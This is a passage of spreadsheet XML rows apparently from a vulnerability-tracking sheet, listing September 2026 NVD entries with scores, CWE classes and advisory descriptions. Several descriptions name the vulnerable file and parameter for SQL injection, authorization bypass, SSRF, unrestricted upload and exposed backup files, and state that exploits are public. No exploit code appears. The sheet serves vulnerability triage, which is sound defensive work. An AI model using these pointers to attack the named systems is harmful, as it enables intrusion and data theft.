          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8304</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B715" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85378</t>
        </is>
      </c>
      <c r="D715" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E715" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F715" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G715" s="5" t="inlineStr"/>
      <c r="H715" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I715" s="5" t="inlineStr"/>
      <c r="J715" s="5" t="inlineStr"/>
      <c r="K715" s="5" t="inlineStr"/>
      <c r="L715" s="5" t="inlineStr"/>
      <c r="M715" s="5" t="inlineStr"/>
      <c r="N715" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O715" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P715" s="5" t="inlineStr"/>
      <c r="Q715" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="R715" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in light0011 cms c774dce31c6df0055568a8d5c53d964d99be199d/f72cf46f601efb2a0618c3814cc2f61380b38930. Affected by this issue is the function AuthController::_initialize of the file App/Admin/Controller/ChapterController.class.php of the component Chapter Controller. The manipulation leads to authorization bypass. The attack can be initiated remotely. The exploit is publicly available and might be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85378</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B716" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85402</t>
        </is>
      </c>
      <c r="D716" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E716" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F716" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G716" s="5" t="inlineStr"/>
      <c r="H716" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I716" s="5" t="inlineStr"/>
      <c r="J716" s="5" t="inlineStr"/>
      <c r="K716" s="5" t="inlineStr"/>
      <c r="L716" s="5" t="inlineStr"/>
      <c r="M716" s="5" t="inlineStr"/>
      <c r="N716" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O716" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P716" s="5" t="inlineStr"/>
      <c r="Q716" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R716" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in code-projects Doctor Appointment System 1.0. This vulnerability affects unknown code of the file /patient/booking.php. The manipulation of the argument doc_id results in sql injection. The attack may be launched remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="S716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85402</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B717" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85516</t>
        </is>
      </c>
      <c r="D717" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E717" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F717" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G717" s="5" t="inlineStr"/>
      <c r="H717" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I717" s="5" t="inlineStr"/>
      <c r="J717" s="5" t="inlineStr"/>
      <c r="K717" s="5" t="inlineStr"/>
      <c r="L717" s="5" t="inlineStr"/>
      <c r="M717" s="5" t="inlineStr"/>
      <c r="N717" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O717" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P717" s="5" t="inlineStr"/>
      <c r="Q717" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R717" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in code-projects Vehicle Management System 1.0. The affected element is an unknown function of the file /busprofile.php. Performing a manipulation of the argument busid results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="S717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85516</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B718" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85638</t>
        </is>
      </c>
      <c r="D718" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E718" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F718" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G718" s="5" t="inlineStr"/>
      <c r="H718" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I718" s="5" t="inlineStr"/>
      <c r="J718" s="5" t="inlineStr"/>
      <c r="K718" s="5" t="inlineStr"/>
      <c r="L718" s="5" t="inlineStr"/>
      <c r="M718" s="5" t="inlineStr"/>
      <c r="N718" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O718" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P718" s="5" t="inlineStr"/>
      <c r="Q718" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="R718" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in jofpin trape 2.0. This affects an unknown part of the file core/user.py. This manipulation of the argument vId/id causes authorization bypass. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85638</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B719" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85703</t>
        </is>
      </c>
      <c r="D719" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E719" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F719" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G719" s="5" t="inlineStr"/>
      <c r="H719" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I719" s="5" t="inlineStr"/>
      <c r="J719" s="5" t="inlineStr"/>
      <c r="K719" s="5" t="inlineStr"/>
      <c r="L719" s="5" t="inlineStr"/>
      <c r="M719" s="5" t="inlineStr"/>
      <c r="N719" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O719" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P719" s="5" t="inlineStr"/>
      <c r="Q719" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R719" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in ramon-victor freegpt-webui up to 098db3dfeb41555c2ca9269df0f13e10ec1c35dc. Affected by this issue is the function getJailbreak of the file server/backend.py of the component Jailbreak Mode. Executing a manipulation can lead to allocation of resources. The attack can be executed remotely. The exploit has been published and may be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. This vulnerability only affects products that are no longer supported by the maintainer.</t>
        </is>
      </c>
      <c r="S719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85703</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B720" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86161</t>
        </is>
      </c>
      <c r="D720" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E720" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F720" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G720" s="5" t="inlineStr"/>
      <c r="H720" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I720" s="5" t="inlineStr"/>
      <c r="J720" s="5" t="inlineStr"/>
      <c r="K720" s="5" t="inlineStr"/>
      <c r="L720" s="5" t="inlineStr"/>
      <c r="M720" s="5" t="inlineStr"/>
      <c r="N720" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O720" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P720" s="5" t="inlineStr"/>
      <c r="Q720" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R720" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in SourceCodester Online Voting System 1.0. The impacted element is an unknown function of the file /ajax.php?action=delete_category. Performing a manipulation of the argument ID results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="S720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86161</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B721" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86183</t>
        </is>
      </c>
      <c r="D721" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E721" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F721" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G721" s="5" t="inlineStr"/>
      <c r="H721" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I721" s="5" t="inlineStr"/>
      <c r="J721" s="5" t="inlineStr"/>
      <c r="K721" s="5" t="inlineStr"/>
      <c r="L721" s="5" t="inlineStr"/>
      <c r="M721" s="5" t="inlineStr"/>
      <c r="N721" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O721" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P721" s="5" t="inlineStr"/>
      <c r="Q721" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="R721" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in diem-project diem up to 5.1.3. This vulnerability affects unknown code of the file dmFrontPlugin/modules/dmWidget/lib/BasedmWidgetActions.class.php of the component dmWidget. Such manipulation of the argument widget_id leads to authorization bypass. The attack may be launched remotely. The exploit is publicly available and might be used. The name of the patch is 116974edfb9a5b8bd69cb13586dc62bcdbb485ad. A patch should be applied to remediate this issue. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86183</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B722" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86217</t>
        </is>
      </c>
      <c r="D722" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E722" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F722" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G722" s="5" t="inlineStr"/>
      <c r="H722" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I722" s="5" t="inlineStr"/>
      <c r="J722" s="5" t="inlineStr"/>
      <c r="K722" s="5" t="inlineStr"/>
      <c r="L722" s="5" t="inlineStr"/>
      <c r="M722" s="5" t="inlineStr"/>
      <c r="N722" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O722" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P722" s="5" t="inlineStr"/>
      <c r="Q722" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="R722" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in code-projects Hotel and Tourism Reservation in PHP 1.0. Affected is an unknown function of the file /ht/hotel_db%20(1).sql of the component Database Backup Handler. The manipulation results in information disclosure. The attack may be launched remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="S722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86217</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B723" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86224</t>
        </is>
      </c>
      <c r="D723" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E723" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F723" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G723" s="5" t="inlineStr"/>
      <c r="H723" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I723" s="5" t="inlineStr"/>
      <c r="J723" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K723" s="5" t="inlineStr"/>
      <c r="L723" s="5" t="inlineStr"/>
      <c r="M723" s="5" t="inlineStr"/>
      <c r="N723" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O723" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P723" s="5" t="inlineStr"/>
      <c r="Q723" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R723" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in SourceCodester Class and Exam Timetabling System 1.0. Affected is the function mysqli_query of the file /admin/modal_add_product.php. Executing a manipulation of the argument fname can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="S723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86224</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B724" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86262</t>
        </is>
      </c>
      <c r="D724" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E724" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F724" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G724" s="5" t="inlineStr"/>
      <c r="H724" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I724" s="5" t="inlineStr"/>
      <c r="J724" s="5" t="inlineStr"/>
      <c r="K724" s="5" t="inlineStr"/>
      <c r="L724" s="5" t="inlineStr"/>
      <c r="M724" s="5" t="inlineStr"/>
      <c r="N724" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O724" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P724" s="5" t="inlineStr"/>
      <c r="Q724" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="R724" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in sfturing hosp_order up to 627f426331da8086ce8fff2017d65b1ddef384f8. This affects the function updateOrderSta1/updateOrderdiseaseInfo of the file ssm_pro/src/main/java/cn/sfturing/web/OrderController.java of the component Order Handler. The manipulation of the argument userID/id leads to authorization bypass. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86262</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B725" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86268</t>
        </is>
      </c>
      <c r="D725" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E725" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F725" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G725" s="5" t="inlineStr"/>
      <c r="H725" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I725" s="5" t="inlineStr"/>
      <c r="J725" s="5" t="inlineStr"/>
      <c r="K725" s="5" t="inlineStr"/>
      <c r="L725" s="5" t="inlineStr"/>
      <c r="M725" s="5" t="inlineStr"/>
      <c r="N725" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O725" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P725" s="5" t="inlineStr"/>
      <c r="Q725" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R725" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in itsourcecode School Management System 1.0. Impacted is an unknown function of the file User_Login.php. The manipulation of the argument email results in sql injection. The attack can be executed remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="S725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86268</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B726" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86273</t>
        </is>
      </c>
      <c r="D726" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E726" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F726" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G726" s="5" t="inlineStr"/>
      <c r="H726" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I726" s="5" t="inlineStr"/>
      <c r="J726" s="5" t="inlineStr"/>
      <c r="K726" s="5" t="inlineStr"/>
      <c r="L726" s="5" t="inlineStr"/>
      <c r="M726" s="5" t="inlineStr"/>
      <c r="N726" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O726" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P726" s="5" t="inlineStr"/>
      <c r="Q726" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R726" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in projeto-siga siga up to 11.1.1. Affected by this issue is the function DownloadExterno.getUrl of the file sigaex/src/main/java/br/gov/jfrj/siga/vraptor/ExUtilController.java of the component HTML-to-PDF Endpoint. This manipulation of the argument html causes server-side request forgery. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86273</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B727" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86305</t>
        </is>
      </c>
      <c r="D727" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E727" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F727" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G727" s="5" t="inlineStr"/>
      <c r="H727" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I727" s="5" t="inlineStr"/>
      <c r="J727" s="5" t="inlineStr"/>
      <c r="K727" s="5" t="inlineStr"/>
      <c r="L727" s="5" t="inlineStr"/>
      <c r="M727" s="5" t="inlineStr"/>
      <c r="N727" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O727" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P727" s="5" t="inlineStr"/>
      <c r="Q727" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="R727" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in light0011 cms c774dce31c6df0055568a8d5c53d964d99be199d/f72cf46f601efb2a0618c3814cc2f61380b38930. Affected by this issue is the function Upload::upload of the file ThinkPHP/Library/Think/Upload.class.php. Performing a manipulation results in unrestricted upload. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86305</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B728" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86519</t>
        </is>
      </c>
      <c r="D728" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E728" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F728" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G728" s="5" t="inlineStr"/>
      <c r="H728" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I728" s="5" t="inlineStr"/>
      <c r="J728" s="5" t="inlineStr"/>
      <c r="K728" s="5" t="inlineStr"/>
      <c r="L728" s="5" t="inlineStr"/>
      <c r="M728" s="5" t="inlineStr"/>
      <c r="N728" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O728" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P728" s="5" t="inlineStr"/>
      <c r="Q728" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="R728" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in code-projects Student Crud Operation 1.0. This impacts an unknown function of the file /card_activation.sql of the component Backup File Handler. The manipulation results in information disclosure. The attack can be launched remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="S728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86519</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B729" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86672</t>
        </is>
      </c>
      <c r="D729" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E729" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F729" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G729" s="5" t="inlineStr"/>
      <c r="H729" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I729" s="5" t="inlineStr"/>
      <c r="J729" s="5" t="inlineStr"/>
      <c r="K729" s="5" t="inlineStr"/>
      <c r="L729" s="5" t="inlineStr"/>
      <c r="M729" s="5" t="inlineStr"/>
      <c r="N729" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O729" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P729" s="5" t="inlineStr"/>
      <c r="Q729" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="R729" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected is an unknown function of the file example.7z of the component Backup Handler. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86672</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B730" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86782</t>
        </is>
      </c>
      <c r="D730" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E730" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F730" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G730" s="5" t="inlineStr"/>
      <c r="H730" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I730" s="5" t="inlineStr"/>
      <c r="J730" s="5" t="inlineStr"/>
      <c r="K730" s="5" t="inlineStr"/>
      <c r="L730" s="5" t="inlineStr"/>
      <c r="M730" s="5" t="inlineStr"/>
      <c r="N730" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O730" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P730" s="5" t="inlineStr"/>
      <c r="Q730" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R730" s="5" t="inlineStr">
        <is>
          <t>The Visualizer  WordPress plugin before 4.0.6 does not properly authorise access to its chart-building actions, allowing users with the Contributor role and above to publish, rename, and overwrite the content of posts and pages they do not own, including other users' private drafts.</t>
        </is>
      </c>
      <c r="S730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86782</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B731" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86808</t>
        </is>
      </c>
      <c r="D731" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E731" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
